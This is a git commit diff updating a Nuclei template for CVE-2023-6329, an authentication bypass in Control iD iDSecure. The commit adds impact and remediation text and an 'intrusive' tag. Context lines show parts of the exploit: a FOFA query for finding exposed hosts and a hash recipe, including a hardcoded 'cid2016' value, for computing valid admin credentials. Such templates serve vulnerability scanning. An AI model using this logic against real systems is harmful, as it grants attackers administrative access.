Update CVE-2023-6329.yaml

patch-11
Prince Chaddha 2024-09-05 11:12:52 +07:00 committed by GitHub
parent d17a8cea09
commit c34971a3b2
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
1 changed files with 11 additions and 8 deletions

View File

@ -6,6 +6,10 @@ info:
severity: critical severity: critical
description: | description: |
An authentication bypass vulnerability exists in Control iD iDSecure v4.7.32.0. The login routine used by iDS-Core.dll contains a "passwordCustom" option that allows an unauthenticated attacker to compute valid credentials that can be used to bypass authentication and act as an administrative user. An authentication bypass vulnerability exists in Control iD iDSecure v4.7.32.0. The login routine used by iDS-Core.dll contains a "passwordCustom" option that allows an unauthenticated attacker to compute valid credentials that can be used to bypass authentication and act as an administrative user.
impact: |
Successful exploitation could allow an attacker to bypass authentication controls.
remediation: |
Apply the vendor-supplied patch or update to the latest firmware version to mitigate the vulnerability.
classification: classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8 cvss-score: 9.8
@ -20,7 +24,7 @@ info:
vendor: controlid vendor: controlid
product: idsecure product: idsecure
fofa-query: body="iDSecure" fofa-query: body="iDSecure"
tags: cve,cve2023,auth-bypass,idsecure,control-id tags: cve,cve2023,auth-bypass,idsecure,control-id,intrusive
variables: variables:
username: "{{rand_base(8)}}" username: "{{rand_base(8)}}"
@ -46,7 +50,6 @@ javascript:
sha256combined: "{{ sha256(sha1Hash+passwordRandom+'cid2016') }}" sha256combined: "{{ sha256(sha1Hash+passwordRandom+'cid2016') }}"
passwordRandom: "{{passwordRandom}}" passwordRandom: "{{passwordRandom}}"
http: http:
- raw: - raw:
- | - |